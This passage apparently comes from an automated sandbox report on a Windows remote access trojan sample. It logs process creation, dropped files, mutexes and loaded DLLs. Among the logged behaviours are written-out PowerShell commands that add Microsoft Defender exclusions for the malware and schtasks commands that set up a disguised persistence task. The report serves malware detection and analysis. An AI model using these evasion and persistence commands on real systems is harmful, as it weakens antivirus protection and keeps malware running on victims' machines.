                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, tc6CFuwhhqKghWoavi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, tc6CFuwhhqKghWoavi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, tc6CFuwhhqKghWoavi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/20@4/4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile created: C:\Users\user\AppData\Roaming\zDAKFK.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7176
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMutant created: \Sessions\1\BaseNamedObjects\oggolgXBJXeVlTZmpbUvnbnkWKC
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBE43.tmpJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeReversingLabs: Detection: 21%
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeVirustotal: Detection: 22%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\zDAKFK.exe C:\Users\user\AppData\Roaming\zDAKFK.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptbase.dllJump to behavior
